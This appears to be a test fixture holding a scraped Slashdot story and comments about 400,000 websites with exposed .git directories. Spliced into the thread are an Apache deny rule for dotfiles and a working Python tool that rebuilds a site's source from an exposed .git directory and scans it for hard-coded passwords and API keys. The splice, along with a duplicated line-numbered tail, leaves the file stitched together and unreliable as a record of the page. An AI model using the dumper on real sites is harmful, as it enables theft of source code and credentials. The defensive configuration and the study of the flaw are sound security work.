Merge branch 'master' of github.com:nikiroo/gofetch
[gofetch.git] / test / expected / SLASHDOT / 0102639752
400,000 WEBSITES VULNERABLE THROUGH EXPOSED .GIT DIRECTORIES
(SCMAGAZINE.COM)

Thursday September 06, 2018 @11:30PM (msmash)
from the security-woes dept.

o Reference: 0102639752
o News link: https://tech.slashdot.org/story/18/09/06/1954253/400000-websites-vulnerable-through-exposed-git-directories
o Source link: https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/


Open .git directories are a bigger cybersecurity problem than
many might imagine, at least according to a Czech security
researcher who [1]discovered almost 400,000 web pages with an
open .git directory possibly exposing a wide variety of data.
From a report:

> Vladimir Smitka began his .git directory odyssey in July
when he began looking at Czech websites to find how many were
improperly configured and allow access to their .git folders
within the file versions repository. Open .git directories are
a particularly dangerous issue, he said, because they can
contain a great deal of sensitive information. "Information
about the website's structure, and sometimes you can get very
sensitive data such as database passwords, API keys,
development IDE settings, and so on. However, this data
shouldn't be stored in the repository, but in previous scans
of various security issues, I have found many developers that
do not follow these best practices," Smitka wrote. Smitka
queried 230 million websites to discover the 390,000 allowing
access to their .git directories. The vast majority of the
websites with open directories had a .com TLD with .net, .de,
.org and .uk comprising most of the others.



[1] https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/


**

** Re: (Score:2, Informative)
(by MidSpeck ( 1516577 ))


^/.*/\.git/
Protect git repositories in all subdirectories as well.


** Re: (Score:2)
(by jrumney ( 197329 ))


Why stop there? Are there any dot files/directories that need
to be served over HTTP?


** Re: .htaccess (Score:3)
(by spongman ( 182339 ))


Why doesn't Apache block all '.'-prefixed directories by
default?

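The pattern MidSpeck posted and jrumney's follow-up ("are there any dot files/directories that need to be served over HTTP?") amount to one rule: refuse every URL with a dot-prefixed path component, in every subdirectory. The Apache 2.4 configuration below is an added example, not something from the article or the commenters; it assumes mod_alias and the 2.4 `Require` syntax, and a docroot of `/var/www/html` that is a placeholder.

```apache
# Put this in the server or vhost config, not in .htaccess: .htaccess is
# itself a dotfile, and a rule that lives inside what it protects is fragile.
# Matches any path component starting with '.', anywhere in the URL, so
# /.git/HEAD, /shop/.git/config, /.env, /.svn/, /.DS_Store are all refused.
# /.well-known/ is excluded because ACME (Let's Encrypt) challenges need it.
<LocationMatch "/\.(?!well-known(?:/|$))">
    Require all denied
</LocationMatch>

# Optional: answer 404 instead of 403 so a scanner cannot distinguish a
# blocked .git from an absent one. mod_alias runs before the access check,
# so for matching URLs this status is what the client sees.
RedirectMatch 404 "/\.(?!well-known(?:/|$))"

# Belt and braces: no directory listings, so /.git/ is never browsable
# even if the rules above are loosened later. Path is a placeholder.
<Directory "/var/www/html">
    Options -Indexes
</Directory>
```

Location sections are merged after Directory sections and .htaccess files, so an `AllowOverride` elsewhere cannot undo this. The nginx equivalent is a single `location ~ /\.(?!well-known) { return 404; }`. Verify from outside with `curl -sI https://<host>/.git/HEAD` and `/.git/config`; anything other than 403 or 404 means the rule is not in effect. The rule is a backstop, not the fix: keep the checkout outside the docroot (or, as jrumney describes further down, serve only a subdirectory of it), and the .git directory is never reachable in the first place.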

**

** Re:https://slashdot.org/.git (Score:4, Informative)
(by ls671 ( 1122017 ))


Slashdot is still using CVS, try [1]https://slashdot.org/CVS/
[slashdot.org]
you will see, it works! :)




[1] https://slashdot.org/CVS/


** Your central git repo ... (Score:1)
(by Qbertino ( 265505 ))


... belongs behind ssh or, at least, behind http access and SSL.
If I catch you doing otherwise for anything other than FOSS
software I'll smack you. Hard.

** Re:Your central git repo ... (Score:4, Informative)
(by tlhIngan ( 30335 ))


> ... belongs behind ssh or, at least, behind http access and
> SSL.
> If I catch you doing otherwise for anything other than FOSS
> software I'll smack you. Hard.
And it probably is. The thing is, the website owners are
using git to version control and deploy their website (not a
bad idea). So they develop their web site, push it to the
central git repo, and whenever they need to go live, they
just do a "git pull" on the webserver and it'll pull down the
latest version of the website.
Problem is, they forget about the hidden .git directory git
makes that stores all sorts of useful information and with a
little persistence, allow you access to the raw source code
since you can access the individual git objects. (Or maybe
even clone it using git).

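The mechanism tlhIngan describes above, and the "database passwords, API keys" claim in the story summary, in working code. This is an added example, not code from the article, from Smitka or from any commenter. The "site" is a constructed one-commit repository (file names, the `dev@example.invalid` author and the `hunter2` secret are all made up), encoded in real git loose-object format and served from a dict; swapping the dict lookup for an HTTP GET of each path is the only change needed against a live host. The attacker side uses nothing but `.git/HEAD`, the branch ref and the loose objects.

```python
# Added example, not code from the article or its commenters: recovering
# source from an exposed .git directory using only HEAD, a branch ref and
# loose objects. The "site" is a constructed one-commit repo, encoded in
# real git loose-object format and served from a dict instead of HTTP.
import hashlib
import re
import zlib
from typing import Callable, Dict, List, Tuple

Fetch = Callable[[str], bytes]  # real use: lambda p: urlopen(base + p).read()


def git_object(kind: str, body: bytes) -> Tuple[str, bytes]:
    """(sha1, zlib-compressed loose object), exactly as git writes it."""
    raw = b"%s %d\0%s" % (kind.encode(), len(body), body)
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_fake_site() -> Dict[str, bytes]:
    """Constructed sample site: config.php (with a made-up secret) and
    index.php committed, deployed with 'git pull' into the docroot."""
    cfg_sha, cfg_obj = git_object("blob", b"<?php\n$db_password = 'hunter2';\n")
    idx_sha, idx_obj = git_object("blob", b"<?php require 'config.php';\n")
    tree_body = b"".join(
        b"100644 %s\0%s" % (name, bytes.fromhex(sha))
        for name, sha in sorted([(b"config.php", cfg_sha), (b"index.php", idx_sha)]))
    tree_sha, tree_obj = git_object("tree", tree_body)
    commit_sha, commit_obj = git_object("commit",
        b"tree %s\nauthor Dev <dev@example.invalid> 1536260000 +0000\n"
        b"committer Dev <dev@example.invalid> 1536260000 +0000\n\ndeploy\n"
        % tree_sha.encode())

    def objpath(sha: str) -> str:
        return ".git/objects/%s/%s" % (sha[:2], sha[2:])

    return {".git/HEAD": b"ref: refs/heads/master\n",
            ".git/refs/heads/master": commit_sha.encode() + b"\n",
            objpath(commit_sha): commit_obj, objpath(tree_sha): tree_obj,
            objpath(cfg_sha): cfg_obj, objpath(idx_sha): idx_obj}


# A real .git/HEAD is "ref: refs/..." or a bare SHA-1. A soft-404 page served
# with status 200 (common on CMS hosts) is neither, so a scanner checks the
# body, not just the status code.
HEAD_RE = re.compile(rb"^(ref: refs/\S+|[0-9a-f]{40})\s*$")


def is_git_exposed(head_body: bytes) -> bool:
    return HEAD_RE.match(head_body) is not None


def read_object(fetch: Fetch, sha: str) -> Tuple[str, bytes]:
    """Fetch and decode one loose object: '<type> <size>\\0<payload>'."""
    raw = zlib.decompress(fetch(".git/objects/%s/%s" % (sha[:2], sha[2:])))
    header, _, body = raw.partition(b"\0")
    kind, size = header.split()
    if int(size) != len(body):
        raise ValueError("corrupt object " + sha)
    return kind.decode(), body


def parse_tree(body: bytes) -> List[Tuple[str, str, str]]:
    """Tree entries are '<mode> <name>\\0<20 raw sha bytes>', back to back."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def dump_source(fetch: Fetch) -> Dict[str, bytes]:
    """HEAD -> branch ref -> commit -> tree(s) -> blobs; returns {path: bytes}."""
    head = fetch(".git/HEAD")
    if not is_git_exposed(head):
        return {}
    if head.startswith(b"ref: "):
        commit_sha = fetch(".git/" + head[5:].strip().decode()).strip().decode()
    else:
        commit_sha = head.strip().decode()  # detached HEAD
    kind, commit = read_object(fetch, commit_sha)
    if kind != "commit":
        raise ValueError("HEAD does not resolve to a commit")
    tree_sha = commit.split(b"\n", 1)[0].split()[1].decode()  # "tree <sha>"
    files: Dict[str, bytes] = {}

    def walk(sha: str, prefix: str) -> None:
        for mode, name, entry_sha in parse_tree(read_object(fetch, sha)[1]):
            if mode == "40000":            # subdirectory
                walk(entry_sha, prefix + name + "/")
            elif mode.startswith("100"):   # regular file; skips symlinks, submodules
                files[prefix + name] = read_object(fetch, entry_sha)[1]

    walk(tree_sha, "")
    return files


SECRET_RE = re.compile(rb"(?i)(password|secret|api[_-]?key|token)\s*=\s*['\"]")


def find_secrets(files: Dict[str, bytes]) -> List[str]:
    """Paths whose content looks like a hard-coded credential assignment."""
    return sorted(p for p, data in files.items() if SECRET_RE.search(data))
```

`dump_source(build_fake_site().__getitem__)` returns both files and `find_secrets` flags `config.php`. Two things a real dumper has to handle that this walk leaves out: objects that exist only inside packfiles under `.git/objects/pack/` (found via `.git/objects/info/packs` or by parsing the `.idx` files), and history, by following the `parent` lines of each commit, which is where a secret that was "removed" in a later commit still lives; that is the case OrangeTide's "rewrite my git history" remark below is about. A plain `git clone` over HTTP, tlhIngan's parenthetical, only works if `git update-server-info` was run on the server, so the object-by-object walk is the usual route.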
** Re: (Score:2)
(by jrumney ( 197329 ))


I do this, it is very convenient for deploying updates to
the site. But I always put the web interface into a
subdirectory, and only configure the web server to see
that so the .git directory is not visible over HTTP. And
dotfiles and directories are blocked in the webserver
config for extra protection against accidental inclusion
of invisible files.



** reheating yesterday's food (Score:3)
(by Tsolias ( 2813011 ))


just an article from 2015 [1]https://en.internetwache.org/d...
[internetwache.org]
I can give you also next year's article about .file
vulnerabilities. (spoiler alert)
[2]https://en.internetwache.org/s... [internetwache.org]




[1] https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/
[2] https://en.internetwache.org/scanning-the-alexa-top-1m-for-ds-store-files-12-03-2018/

**

** KKK (Score:2)
(by Tsolias ( 2813011 ))


> That's what you get on hiring those bootcamp "graduates"
Kode w/ Karlie Kloss, like it or not.


** Alternate headline: 99.8% websites are OK (Score:2)
(by jmichaelg ( 148257 ))


230 million websites. 400k poorly configured. 4*10^5/2.3*10^8 is
less than 0.2% of websites surveyed screwed this up.
400k is a big number but it's good to know most developers
aren't that stupid on this issue.

**

** Re: yarn dist (Score:2)
(by TimMD909 ( 260285 ))


... Equifax types for free security tests from 3rd parties
and press coverage, presumably...


** So? (Score:2)
(by cshark ( 673578 ))


An open git directory will be everything you need to reconstruct
the site, more often than not from the same server you're
targeting. Scary. Database servers are rarely open. Short of
some serious hacking, there isn't a lot you're going to be able
to do with this stuff once you've obtained the information
you're waving around here.
Until such time as I see hackers actually logging in with this
information and defacing github, I'm going to remain unconvinced
of the severity of this one.

** Re: (Score:2)
(by OrangeTide ( 124937 ))


My website's .git directories are open intentionally. Makes
for convenient mirroring and viewing of archives without
having to hope and pray wayback machine picked up my obscure
website.
I'm not too worried. It's just data on the filesystem, it's
not executing programs. And the data is not supposed to
contain any secrets. If it ever does then I better rewrite my
git history.


** Re: (Score:1)
(by Anonymous Coward)


The most likely actual security implication is hard coded
keys to 3rd party APIs.
Not that this is an inevitable threat, it’s just
something I could see being inadvertently exposed and useful
without much additional effort.

** Re: (Score:1)
(by Orrin Bloquy ( 898571 ))


> it’s
Clear something up, are you typing curly
quotes/apostrophes on purpose or do you have your browser
configured to automatically do that.



** Re: (Score:2)
(by jonwil ( 467024 ))


What about if that .git folder (and the website's source
code) included private keys for stuff. Or credentials/API
keys for 3rd party services. Or credentials for database and
other servers.



225 (by jonwil ( 467024 ))\r
226\r
227 \r
228 What about if that .git folder (and the website's source\r
229 code) included private keys for stuff. Or credentials/API\r
230 keys for 3rd party services. Or credentials for database and\r
231 other servers.\r
232\r
233\r
234\r